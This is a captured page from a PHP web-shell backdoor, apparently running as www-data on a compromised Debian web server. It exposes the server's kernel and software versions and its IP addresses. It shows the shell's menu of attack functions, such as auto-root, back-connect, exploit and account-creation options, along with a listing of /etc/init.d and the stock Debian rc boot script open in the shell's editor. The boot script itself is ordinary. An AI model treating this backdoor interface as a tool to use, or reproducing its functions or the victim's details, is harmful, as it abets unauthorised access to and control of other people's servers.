Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.15.2.239
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
init.d /
[ HOME SHELL ]
Name
Size
Permission
Action
.depend.boot
1.39
KB
-rw-r--r--
.depend.start
729
B
-rw-r--r--
.depend.stop
1.23
KB
-rw-r--r--
README
2.37
KB
-rw-r--r--
acpid
2.22
KB
-rwxr-xr-x
apache-htcacheclean
2.43
KB
-rwxr-xr-x
apache2
7.99
KB
-rwxr-xr-x
apparmor
3.65
KB
-rwxr-xr-x
atd
1.05
KB
-rwxr-xr-x
bootlogs
1.25
KB
-rwxr-xr-x
bootmisc.sh
1.2
KB
-rwxr-xr-x
brightness
2.13
KB
-rwxr-xr-x
checkfs.sh
3.56
KB
-rwxr-xr-x
checkroot-bootclean.sh
1.05
KB
-rwxr-xr-x
checkroot.sh
9.3
KB
-rwxr-xr-x
console-setup.sh
1.2
KB
-rwxr-xr-x
cron
2.99
KB
-rwxr-xr-x
dbus
2.75
KB
-rwxr-xr-x
exim4
6.99
KB
-rwxr-xr-x
firewalld
2.25
KB
-rwxr-xr-x
halt
1.3
KB
-rwxr-xr-x
hostname.sh
927
B
-rwxr-xr-x
hwclock.sh
3.72
KB
-rwxr-xr-x
irqbalance
2.39
KB
-rwxr-xr-x
keyboard-setup.sh
1.44
KB
-rwxr-xr-x
killprocs
1.27
KB
-rwxr-xr-x
kmod
2
KB
-rwxr-xr-x
mountall-bootclean.sh
677
B
-rwxr-xr-x
mountall.sh
2.67
KB
-rwxr-xr-x
mountdevsubfs.sh
1.43
KB
-rwxr-xr-x
mountkernfs.sh
1.53
KB
-rwxr-xr-x
mountnfs-bootclean.sh
685
B
-rwxr-xr-x
mountnfs.sh
2.39
KB
-rwxr-xr-x
mysql
6.06
KB
-rwxr-xr-x
netfilter-persistent
1.33
KB
-rwxr-xr-x
networking
4.34
KB
-rwxr-xr-x
nfs-common
5.53
KB
-rwxr-xr-x
php5.6-fpm
4.19
KB
-rwxr-xr-x
php7.0-fpm
4.19
KB
-rwxr-xr-x
php7.2-fpm
4.19
KB
-rwxr-xr-x
php7.3-fpm
4.19
KB
-rwxr-xr-x
php7.4-fpm
4.19
KB
-rwxr-xr-x
php8.2-fpm
4.19
KB
-rwxr-xr-x
procps
924
B
-rwxr-xr-x
rc
6.13
KB
-rwxr-xr-x
rc.local
820
B
-rwxr-xr-x
rcS
117
B
-rwxr-xr-x
reboot
661
B
-rwxr-xr-x
rmnologin
1.01
KB
-rwxr-xr-x
rpcbind
2.42
KB
-rwxr-xr-x
rsync
4.31
KB
-rwxr-xr-x
rsyslog
2.8
KB
-rwxr-xr-x
saned
2.17
KB
-rwxr-xr-x
sendsigs
3.13
KB
-rwxr-xr-x
single
592
B
-rwxr-xr-x
ssh
3.85
KB
-rwxr-xr-x
sudo
1.01
KB
-rwxr-xr-x
udev
6.71
KB
-rwxr-xr-x
umountfs
2.71
KB
-rwxr-xr-x
umountnfs.sh
2.21
KB
-rwxr-xr-x
umountroot
1.21
KB
-rwxr-xr-x
unattended-upgrades
1.36
KB
-rwxr-xr-x
urandom
3.04
KB
-rwxr-xr-x
x11-common
2.69
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rc
#! /bin/sh # # rc # # Starts/stops services on runlevel changes. # # Optimization: A start script is not run when the service was already # configured to run in the previous runlevel. A stop script is not run # when the the service was already configured not to run in the previous # runlevel. # # Authors: # Miquel van Smoorenburg <miquels@cistron.nl> # Bruce Perens <Bruce@Pixar.com> PATH=/sbin:/usr/sbin:/bin:/usr/bin export PATH # Un-comment the following for interactive debugging. Do not un-comment # this for debugging a real boot process as no scripts will be executed. # debug=echo # Make sure the name survive changing the argument list scriptname="$0" umask 022 on_exit() { echo "error: '$scriptname' exited outside the expected code flow." } trap on_exit EXIT # Enable emergency handler # Ignore CTRL-C only in this shell, so we can interrupt subprocesses. trap ":" INT QUIT TSTP # Set onlcr to avoid staircase effect. stty onlcr 0>&1 # Now find out what the current and what the previous runlevel are. runlevel=$RUNLEVEL # Get first argument. Set new runlevel to this argument. [ "$1" != "" ] && runlevel=$1 if [ "$runlevel" = "" ] then echo "Usage: $scriptname <runlevel>" >&2 exit 1 fi previous=$PREVLEVEL [ "$previous" = "" ] && previous=N export runlevel previous if [ -f /etc/default/rcS ] ; then . /etc/default/rcS fi export VERBOSE if [ -f /lib/lsb/init-functions ] ; then . /lib/lsb/init-functions else log_action_msg() { echo $@; } log_failure_msg() { echo $@; } log_warning_msg() { echo $@; } fi # # Check if we are able to use make like booting. It require the # insserv package to be enabled. Boot concurrency also requires # startpar to be installed. # CONCURRENCY=makefile test -s /etc/init.d/.depend.boot || CONCURRENCY="none" test -s /etc/init.d/.depend.start || CONCURRENCY="none" test -s /etc/init.d/.depend.stop || CONCURRENCY="none" if test -e /etc/init.d/.legacy-bootordering ; then CONCURRENCY="none" fi if grep -wqs concurrency=none /proc/cmdline; then CONCURRENCY="none" fi if ! test -e /proc/stat; then # startpar requires /proc/stat if [ "$(uname)" = "GNU/kFreeBSD" ] ; then mount -t linprocfs linprocfs /proc elif [ "$(uname)" = "GNU" ] ; then mount -t proc none /proc -ocompatible fi fi if [ -x /lib/startpar/startpar ] ; then STARTPAR=/lib/startpar/startpar else STARTPAR=startpar fi $STARTPAR -v > /dev/null 2>&1 || CONCURRENCY="none" # # Start script or program. # case "$CONCURRENCY" in makefile|startpar|shell) # startpar and shell are obsolete CONCURRENCY=makefile log_action_msg "Using makefile-style concurrent boot in runlevel $runlevel" startup() { eval "$($STARTPAR -p 4 -t 20 -T 3 -M $1 -P $previous -R $runlevel)" if [ -n "$failed_service" ] then log_failure_msg "startpar: service(s) returned failure: $failed_service" fi if [ -n "$skipped_service_not_installed" ] then log_warning_msg "startpar: service(s) skipped, program is not installed: $skipped_service_not_installed" fi if [ -n "$skipped_service_not_configured" ] then log_warning_msg "startpar: service(s) skipped, program is not configured: $skipped_service_not_configured" fi unset failed_service skipped_service_not_installed skipped_service_not_configured } ;; none|*) startup() { action=$1 shift scripts="$@" for script in $scripts ; do $debug "$script" $action done } ;; esac # Is there an rc directory for this new runlevel? if [ -d /etc/rc$runlevel.d ] then case "$runlevel" in 0|6) ACTION=stop ;; S) ACTION=start ;; *) ACTION=start ;; esac # First, run the KILL scripts. if [ makefile = "$CONCURRENCY" ] then if [ "$ACTION" = "start" ] && [ "$previous" != N ] then startup stop fi elif [ "$previous" != N ] then CURLEVEL="" for s in /etc/rc$runlevel.d/K* do # Extract order value from symlink level=${s#/etc/rc$runlevel.d/K} level=${level%%[a-zA-Z]*} if [ "$level" = "$CURLEVEL" ] then continue fi CURLEVEL=$level SCRIPTS="" for i in /etc/rc$runlevel.d/K$level* do # Check if the script is there. [ ! -f $i ] && continue # # Find stop script in previous runlevel but # no start script there. # suffix=${i#/etc/rc$runlevel.d/K[0-9][0-9]} previous_stop=/etc/rc$previous.d/K[0-9][0-9]$suffix previous_start=/etc/rc$previous.d/S[0-9][0-9]$suffix # # If there is a stop script in the previous level # and _no_ start script there, we don't # have to re-stop the service. # [ -f $previous_stop ] && [ ! -f $previous_start ] && continue # Stop the service. SCRIPTS="$SCRIPTS $i" done startup stop $SCRIPTS done fi if [ makefile = "$CONCURRENCY" ] then if [ S = "$runlevel" ] then startup boot else startup $ACTION fi else # Now run the START scripts for this runlevel. CURLEVEL="" for s in /etc/rc$runlevel.d/S* do # Extract order value from symlink level=${s#/etc/rc$runlevel.d/S} level=${level%%[a-zA-Z]*} if [ "$level" = "$CURLEVEL" ] then continue fi CURLEVEL=$level SCRIPTS="" for i in /etc/rc$runlevel.d/S$level* do [ ! -f $i ] && continue suffix=${i#/etc/rc$runlevel.d/S[0-9][0-9]} if [ "$previous" != N ] then # # Find start script in previous runlevel and # stop script in this runlevel. # stop=/etc/rc$runlevel.d/K[0-9][0-9]$suffix previous_start=/etc/rc$previous.d/S[0-9][0-9]$suffix # # If there is a start script in the previous level # and _no_ stop script in this level, we don't # have to re-start the service. # if [ start = "$ACTION" ] ; then [ -f $previous_start ] && [ ! -f $stop ] && continue else # Workaround for the special # handling of runlevels 0 and 6. previous_stop=/etc/rc$previous.d/K[0-9][0-9]$suffix # # If there is a stop script in the previous level # and _no_ start script there, we don't # have to re-stop the service. # [ -f $previous_stop ] && [ ! -f $previous_start ] && continue fi fi SCRIPTS="$SCRIPTS $i" done startup $ACTION $SCRIPTS done fi fi trap - EXIT # Disable emergency handler exit 0
Close